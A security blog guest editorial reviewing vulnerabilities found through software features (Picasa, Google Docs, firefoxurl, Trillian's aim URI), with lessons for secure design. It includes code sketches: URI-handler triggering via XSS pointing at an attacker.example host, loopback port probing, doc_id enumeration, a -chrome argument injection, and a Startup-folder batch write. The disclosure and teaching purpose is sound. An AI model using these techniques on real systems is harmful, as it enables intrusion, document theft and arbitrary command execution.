Finding and exploiting holes in software features

Written by Ryan Naraine, Contributor

* Ryan Naraine is on vacation. 

Guest Editorial by Nate McFeters

Finding exploits in software features

With the holiday season fast approaching, and in the spirit of giving, I thought I'd compile a list of the top features that led to security issues I discovered with co-researcher Billy Rios.

With the New Year on its way, this should give the developers out there a chance to come up with some New Year's resolutions regarding the lessons learned from a year in the wild world of computer security.

Picasa's Button Import Feature and Built-in Web Browser/Server

Google's Picasa includes a button import feature that can be accessed from a URI. This feature is actually quite useful, as it allows a user to click a link and import an XML description of a button into Picasa; when clicked, that button posts images to Tabblo or Flickr albums. The upload is handled by a Java applet that requires user interaction.

Unfortunately, URIs are also reachable by attackers through cross-site scripting (XSS), so an attacker can XSS a Picasa user, load Flash (which doesn't do DNS pinning; this just missed our list), and then steal the user's images without any interaction or confirmation.
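To make the delivery step concrete, here's a minimal sketch. The "picasa://importbutton" scheme and its parameters are assumptions standing in for whatever handler Picasa actually registers; the point is only the pattern of firing a locally registered URI handler from injected script.

```typescript
// Illustrative sketch only: the "picasa://importbutton" scheme and parameters
// below are assumptions, not Picasa's documented handler syntax. Script
// injected via XSS can fire a local URI handler with no click from the victim.
const attackerButtonXml = "http://attacker.example/button.xml"; // hypothetical

const frame = document.createElement("iframe");
frame.style.display = "none"; // invisible to the victim
frame.src = `picasa://importbutton/?url=${encodeURIComponent(attackerButtonXml)}`;
document.body.appendChild(frame); // the navigation triggers the registered handler
```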

I use Picasa to modify my pictures, but I can't help worrying about the built-in web browser and web server that Picasa includes. Sure, the server is bound to the local loopback, but as mentioned above, we can reach it through Flash loaded in Picasa's built-in browser, and from there attack the built-in server itself, which may lead to more vulnerabilities.

Starting web servers on the local loopback appears to be a design pattern for Google, as Google Desktop does the same. From a features standpoint, this may provide a rich environment for extending applications. It's important to consider the task at hand, though, and in the case of an application used for photo editing, I have a hard time finding justification for running any service at all.
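As a rough sketch of why loopback-only binding is not a boundary against code already running on the machine (or inside an embedded browser on it), consider a simple port probe. The port range and the use of fetch are illustrative assumptions, not Picasa's actual configuration; the original attack used Flash rather than modern browser APIs.

```typescript
// Minimal sketch, assuming a hypothetical port range: anything that can run
// script locally (Flash in the original attack, plain fetch here) can still
// reach a server bound to 127.0.0.1.
async function probeLoopback(): Promise<number[]> {
  const listening: number[] = [];
  for (let port = 3000; port <= 3010; port++) {
    try {
      // If anything answers, even with an error page, the port is in use.
      await fetch(`http://127.0.0.1:${port}/`, { mode: "no-cors" });
      listening.push(port);
    } catch {
      // Connection refused: nothing is listening on this port.
    }
  }
  return listening;
}
```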

Google Documents

Not to pick on Google here (they actually have a great security team), but the concept of Google Documents must not have been discussed with them. As if having Google take ownership of your documents weren't a big enough security risk, Billy and I have discovered a couple of holes that allow attackers to steal any document whose "doc_id" they can guess, and that value is actually predictable.
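The danger of a guessable identifier is easy to demonstrate in the abstract. The sketch below walks a sequential ID space against a placeholder endpoint; the URL and ID format are assumptions for illustration, not Google's actual interface.

```typescript
// Sketch of ID enumeration, assuming a hypothetical endpoint and sequential
// doc_id values: if the identifier is predictable, an attacker can simply
// walk the space and collect whatever the holes expose.
async function enumerateDocs(startId: number, count: number): Promise<string[]> {
  const leaked: string[] = [];
  for (let id = startId; id < startId + count; id++) {
    const res = await fetch(`https://docs.example.com/view?doc_id=${id}`);
    if (res.ok) {
      leaked.push(await res.text()); // document content exposed to the attacker
    }
  }
  return leaked;
}
```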

Feature-rich applications that offer people excellent functionality are great, but the privacy implications of putting potentially sensitive documents into the hands of a web application accessible to millions are monumental. Perhaps a better solution would've been to give users the option to do offline editing and keep their documents local.

The “firefoxurl” URI and the “-chrome” Argument

The firefoxurl URI basically opens Firefox and points it at a URL. This means an attacker can use an XSS vector to invoke that URI, start an instance of firefox.exe, and pass values to its command line. Since those values weren't sanitized, an attacker could inject additional command-line arguments by breaking out of the current argument with a double-quote character.

Alone, this may not have been a major concern; however, Firefox also accepts the -chrome argument, which allows arbitrary chrome-privileged JavaScript to be passed to Firefox. That, in turn, allows us to run arbitrary commands.
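A simplified reconstruction of the injection is below. It is a sketch of the general shape of the flaw, not a verified exploit string; the example.com host and the alert payload are placeholders.

```typescript
// Simplified reconstruction (not a verified exploit string): the browser that
// registered "firefoxurl" passed the whole URI to firefox.exe without escaping
// quotes, so a double quote closes the current argument and everything after
// it is parsed as new command-line switches, including -chrome.
const injectedUri =
  'firefoxurl://example.com" -chrome "javascript:alert(\'chrome-privileged\')';

// Delivery works from any XSS vector; navigating to the URI (or loading it in
// a hidden iframe, as in the Picasa sketch above) hands it to the handler.
location.href = injectedUri;
```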

These features do not seem to be necessary for normal users. If the feature were necessary, some amount of sanitization should've occurred before the user-supplied input was passed along to the command line.

Trillian's "aim" URI

"Hold on. The ini argument writes to the file it specifies?!” That was what Billy asked me over an IM session several months ago. "Yeah, I can control where it writes a file to," I responded. "Can you write content to it?" Billy asked. "No! That would be crazy," I replied.

WRONG! I could write arbitrary content to any file, including a batch script dropped into the Startup folder. This seemingly harmless option led to command injection through XSS. The functionality should've just been hard-coded into the application. The same URI also proved vulnerable to a stack overflow, as user-supplied input from the URI was not bounds-checked.
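The sketch below shows the general shape of such an abuse. The "aim:goim" form follows the familiar AIM URI style, but the "ini" parameter name, its syntax, and the file path are assumptions used only to illustrate how a URI-controlled path plus attacker-controlled content becomes an arbitrary file write.

```typescript
// Illustrative sketch, assuming hypothetical parameter handling: a URI that
// lets the caller choose both a file path and its contents is effectively an
// arbitrary file write, e.g. a batch script dropped into the Startup folder
// that runs at the victim's next logon.
const startupPath =
  "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\run.bat";
const payload = "calc.exe"; // stand-in for an arbitrary command

const aimUri =
  `aim:goim?screenname=victim&ini=${encodeURIComponent(startupPath)}` +
  `&message=${encodeURIComponent(payload)}`;

// As with the other URI handlers, any XSS vector can deliver it:
const el = document.createElement("iframe");
el.style.display = "none";
el.src = aimUri;
document.body.appendChild(el);
```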

So, what lessons have we learned this year? Well, the number of features is directly proportional to the amount of attack surface, and with URI abuse it's even worse, since the features can be exploited through XSS. Some of these flaws should've been caught during a secure SDLC process, and it's amazing that more companies aren't performing such reviews.

Considering that XSS can be used to scan and attack internal machines, trigger memory corruption and command injection flaws, and steal data, it can't possibly be ignored. Claiming XSS is not an issue is akin to believing that global warming is not an issue.

We are a long way from having all applications go through a secure design review. We're even further from the day when security wins out over features.

* Nate McFeters is a Senior Security Advisor for Ernst & Young’s Advanced Security Center. He has performed web application, deep source code, Internet, Intranet, wireless, dial-up, and social engineering engagements for several clients in the Fortune 500.
